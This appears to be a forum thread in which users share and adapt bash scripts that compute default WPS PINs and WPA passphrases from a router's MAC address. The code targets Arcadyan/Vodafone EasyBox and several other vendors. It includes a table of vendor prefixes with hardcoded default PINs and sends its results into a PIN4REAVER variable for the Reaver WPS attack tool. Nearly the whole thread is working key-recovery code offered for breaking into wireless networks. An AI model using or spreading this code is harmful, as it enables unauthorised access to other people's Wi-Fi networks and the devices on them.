I made an update of wpspin and I implemented the corrected algorithm in bash in a function called arcadyan
I just simplified and corrected the bash code for the WPA from wotan and used it for the PIN with the same variables
You "feed it" with $BSSID which is the MAC address of the target in original format XX:XX:XX:XX:XX:XX
It gives you back $DEFAULTWPA with the WPA passphrase and $STRING which are the 7 numbers of the PIN
then it calls $CHECKSUM that you already have implemented in your script to generate the full PIN (variable $PIN)
Code:
ARCADYAN(){
# WPSPIN 1.5 - GPL v 3 by kcdtv
# This function uses three amazing works
# 1) easybox_keygen.sh (c) 2012 GPLv3 by Stefan Wotan and Sebastian Petters from www.wotan.cc
# 2) easybox_wps.py by Stefan Viehböck http://seclists.org/fulldisclosure/2013/Aug/51
# 3) Vodafone-XXXX Arcadyan Essid,PIN WPS and WPA Key Generator by Coeman76 from lampiweb team (www.lampiweb.com)
#
# Thanks to the three of them for their dedication and passion and for delivering full disclosure and free code
# This function is based on the script easybox_keygen.sh previously mentioned
#
# The quotations from the original work start with double dash and are between quotes
# Some variables and lines are changed for a better integration and I add the PIN calculation and Coeman trick for default WPA
# the lines quoted with six dash and "unchanged" are exactly the same as in easybox_keygen like this "######unchanged"
# This function requires $BSSID which is the mac address ( hex may format XX:XX:XX:XX:XX:XX)
# It will return $DEFAULTSSID, with essid by default, the wpa passphrase ($DEFAULTWPA) and $STRING, the 7 first digits of our PIN, ready to use in CHECKSUM to
# give the full WPS PIN ($PIN)

## "Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal." < original quote from easybox_keygen.sh
deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) # suppression of $take5 and $last4 compared with easybox code, the job is directly done in the array value assignment, also the variable $MAC has been replaced by $BSSID that is used in WPSPIN
## "The digits M9 to M12 are just the last digits (9.-12.) of the MAC:" < original quote from easybox_keygen.sh
hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g'))                       ######unchanged
## K1 = last byte of (d0 + d1 + h2 + h3) < original quote from easybox_keygen.sh
## K2 = last byte of (h0 + h1 + d2 + d3) < original quote from easybox_keygen.sh
c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})  ######unchanged
c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})  ######unchanged
K1=$((($c1)%16))                 ######unchanged
K2=$((($c2)%16))                 ######unchanged
X1=$((K1^${deci[3]}))            ######unchanged
X2=$((K1^${deci[2]}))            ######unchanged
X3=$((K1^${deci[1]}))            ######unchanged
Y1=$((K2^0x${hexi[1]}))          ######unchanged
Y2=$((K2^0x${hexi[2]}))          ######unchanged
Y3=$((K2^0x${hexi[3]}))          ######unchanged
Z1=$((0x${hexi[2]}^${deci[3]}))  ######unchanged
Z2=$((0x${hexi[3]}^${deci[2]}))  ######unchanged
Z3=$((K1^K2))                    ######unchanged
STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev) # this to generate later our PIN, the 7 first digits
DEFAULTWPA=$(printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F | tr 0 1) # the change with respect to the original script in the most important thing, the default pass, is the adaptation of Coeman76's work on spanish vodafone where he found out that no 0 were used in the final pass
CHECKSUM
}
I put you back CHECKSUM in case it helps you
Code:
CHECKSUM(){                                                              # The function checksum was written for bash by antares_145 from crack-wifi.com
PIN=`expr 10 '*' $STRING`                                                # We will have to define first the string $STRING (the 7 first numbers of the WPS PIN)
ACCUM=0                                                                  # to get a result using this function)
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`   # multiplying the first number by 3, the second by 1, the third by 3 etc....
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`         # so we follow the pattern for our seven numbers
DIGIT=`expr $ACCUM '%' 10`                                               # we define our digit control: the sum reduced with base 10 to the unit number
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`                             # the checksum is equal to " 10 minus digit control "
PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`)                         # Some zero-padding in case that the value of the PIN is under 10000000
}                                                                        # STRING + CHECKSUM gives the full WPS PIN
feel free to use the code and if you have any question about it do not hesitate to ask
cheers
Nice work matey.
I know you said feel free to ask any questions, but I was wondering if I could go a step further and ask if you would be able to correct the script for me please. :-)
I'm sorry to ask, I'm still very new to this sort of thing. LOL
If you can, please feel free to add any credits or such.
Code:
#!/bin/bash
#
#
#
#####################################################################
AP_essid=$(cat $HOME/FrankenScript/Scripts/AP_essid.txt)
AP_bssid=$(cat $HOME/FrankenScript/Scripts/AP_bssid.txt)
ESSID=$(echo $AP_essid)
BSSID=$(echo $AP_bssid)
#####################################################################

FUNC_CHECKSUM(){
ACCUM=0

ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`

DIGIT=`expr $ACCUM '%' 10`
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`

PIN=`expr $PIN '+' $CHECKSUM`
ACCUM=0

ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1 ')' '%' 10 ')'`

RESTE=`expr $ACCUM '%' 10`
}

CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':')
FINBSSID=$(echo $BSSID | cut -d ':' -f4-)
MAC=$(echo $FINBSSID | tr -d ':')
CONVERTEDMAC=$(printf '%d\n' 0x$MAC)
FINESSID=$(echo $ESSID | cut -d '-' -f2)
PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':')
CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':')
MACESSID=$(echo $PAREMAC$FINESSID)
STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`
PIN=`expr 10 '*' $STRING`
FUNC_CHECKSUM
PINWPS1=$(printf '%08d\n' $PIN)
STRING2=`expr $STRING '+' 8`
PIN=`expr 10 '*' $STRING2`
FUNC_CHECKSUM
PINWPS2=$(printf '%08d\n' $PIN)
STRING3=`expr $STRING '+' 14`
PIN=`expr 10 '*' $STRING3`
FUNC_CHECKSUM
PINWPS3=$(printf '%08d\n' $PIN)

if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] && [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] && [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]]; then
    CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID)
    RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'`
    STRING4=`expr $RAIZ '+' 7`
    PIN=`expr 10 '*' $STRING4`
    FUNC_CHECKSUM
    PINWPS4=$(printf '%08d\n' $PIN)
    echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS4 "
    PIN4REAVER=$PINWPS4
else
    case $CHECKBSSID in
    04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0)
        echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 $RED"Other Possible Pin"$RED:$STAND $PINWPS2 $RED"Other Possible Pin"$RED:$STAND $PINWPS3"
        PIN4REAVER=$PINWPS1
        ;;
    001915)
        echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
        PIN4REAVER=12345670
        ;;
    404A03)
        echo -e "$RED"Other Possible Pin"$RED:$STAND 11866428"
        PIN4REAVER=11866428
        ;;
    F43E61 | 001FA4)
        echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
        PIN4REAVER=12345670
        ;;
    001A2B)
        if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]]; then
            echo -e "$RED"Other Possible Pin"$RED:$STAND 88478760"
            PIN4REAVER=88478760
        else
            echo -e "PIN POSSIBLE... > $PINWPS1"
            PIN4REAVER=$PINWPS1
        fi
        ;;
    3872C0)
        if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]]; then
            echo -e "$RED"Other Possible Pin"$RED:$STAND 18836486"
            PIN4REAVER=18836486
        else
            echo -e "PIN POSSIBLE > $PINWPS1"
            PIN4REAVER=$PINWPS1
        fi
        ;;
    FCF528)
        echo -e "$RED"Other Possible Pin"$RED:$STAND 20329761"
        PIN4REAVER=20329761
        ;;
    3039F2)
        echo -e "several possible PINs, ranked in order> 16538061 16702738 18355604 88202907 73767053 43297917"
        PIN4REAVER=16538061
        ;;
    A4526F)
        echo -e "several possible PINs, ranked in order> 16538061 88202907 73767053 16702738 43297917 18355604 "
        PIN4REAVER=16538061
        ;;
    74888B)
        echo -e "several possible PINs, ranked in order> 43297917 73767053 88202907 16538061 16702738 18355604"
        PIN4REAVER=43297917
        ;;
    DC0B1A)
        echo -e "several possible PINs, ranked in order> 16538061 16702738 18355604 88202907 73767053 43297917"
        PIN4REAVER=16538061
        ;;
    5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4)
        echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 "
        PIN4REAVER=$PINWPS1
        ;;
    002275)
        echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
        PIN4REAVER=$PINWPS1
        ;;
    08863B)
        echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
        PIN4REAVER=$PINWPS1
        ;;
    001CDF)
        echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
        PIN4REAVER=$PINWPS1
        ;;
    00A026)
        echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
        PIN4REAVER=$PINWPS1
        ;;
    5057F0)
        echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
        PIN4REAVER=$PINWPS1
        ;;
    C83A35 | 00B00C | 081075)
        echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
        PIN4REAVER=$PINWPS1
        ;;
    E47CF9 | 801F02)
        echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
        PIN4REAVER=$PINWPS1
        ;;
    0022F7)
        echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
        PIN4REAVER=$PINWPS1
        ;;
    *)
        PIN4REAVER=$PINWPS1
        ;;
    esac
fi
Last edited by slim76; 2014-01-30 at 03:09.
you should collect the arcadyan mac to redact your case in condition
where you have the X you put the first 6 digits of the arcadyan mac without the colons
Code:
;; XXXXXX | XXXXXX)
and then you generate string
Code:
deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g'))
hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g'))
c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})
c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})
K1=$((($c1)%16))
K2=$((($c2)%16))
X1=$((K1^${deci[3]}))
X2=$((K1^${deci[2]}))
X3=$((K1^${deci[1]}))
Y1=$((K2^0x${hexi[1]}))
Y2=$((K2^0x${hexi[2]}))
Y3=$((K2^0x${hexi[3]}))
Z1=$((0x${hexi[2]}^${deci[3]}))
Z2=$((0x${hexi[3]}^${deci[2]}))
Z3=$((K1^K2))
STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev)
then you generate the checksum to get the full PIN
Code:
PIN=`expr 10 '*' $STRING`
FUNC_CHECKSUM
PIN4REAVER=$(printf '%08d\n' $PIN)
that will give you
Code:
;;
XXXXXX | XXXXXX)
    deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g'))
    hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g'))
    c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})
    c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})
    K1=$((($c1)%16))
    K2=$((($c2)%16))
    X1=$((K1^${deci[3]}))
    X2=$((K1^${deci[2]}))
    X3=$((K1^${deci[1]}))
    Y1=$((K2^0x${hexi[1]}))
    Y2=$((K2^0x${hexi[2]}))
    Y3=$((K2^0x${hexi[3]}))
    Z1=$((0x${hexi[2]}^${deci[3]}))
    Z2=$((0x${hexi[3]}^${deci[2]}))
    Z3=$((K1^K2))
    STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev)
    PIN=`expr 10 '*' $STRING`
    FUNC_CHECKSUM
    PIN4REAVER=$(printf '%08d\n' $PIN)
that you have to place in your case esac statement, anywhere as long as it is before
Code:
;; *)
Sorry mate I meant would you be able to amend the script I posted so I only have to paste it back into FrankenScript.
I know it's kinda cheeky to ask, sorry. :-)
I've been in stupid mode for the last few days and I'm having trouble following even simple things. LOL